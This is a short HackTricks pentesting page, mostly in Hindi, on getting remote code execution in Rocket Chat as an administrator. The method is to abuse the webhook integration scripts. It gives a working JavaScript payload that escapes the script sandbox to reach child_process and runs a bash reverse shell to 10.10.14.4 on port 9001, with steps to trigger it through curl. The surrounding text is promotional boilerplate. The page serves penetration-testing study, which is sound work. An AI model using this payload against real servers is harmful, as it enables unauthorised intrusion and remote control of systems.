hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

Rocket Chat

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

{% embed url="https://websec.nl/" %}

RCE

यदि आप Rocket Chat के अंदर व्यवस्थापक हैं तो आप RCE प्राप्त कर सकते हैं।

• Integrations पर जाएं और New Integration चुनें और कोई भी चुनें: Incoming WebHook या Outgoing WebHook।
• /admin/integrations/incoming

• docs के अनुसार, दोनों ES2015 / ECMAScript 6 (बुनियादी रूप से JavaScript) का उपयोग डेटा को संसाधित करने के लिए करते हैं। तो चलिए एक rev shell for javascript प्राप्त करते हैं जैसे:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

• WebHook कॉन्फ़िगर करें (चैनल और पोस्ट के रूप में उपयोगकर्ता नाम होना चाहिए):

• WebHook स्क्रिप्ट कॉन्फ़िगर करें:

• परिवर्तनों को सहेजें
• उत्पन्न WebHook URL प्राप्त करें:

• इसे curl के साथ कॉल करें और आपको rev shell प्राप्त होना चाहिए

{% embed url="https://websec.nl/" %}

{% hint style="success" %} AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाएँ जांचें!
• हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

{% endhint %}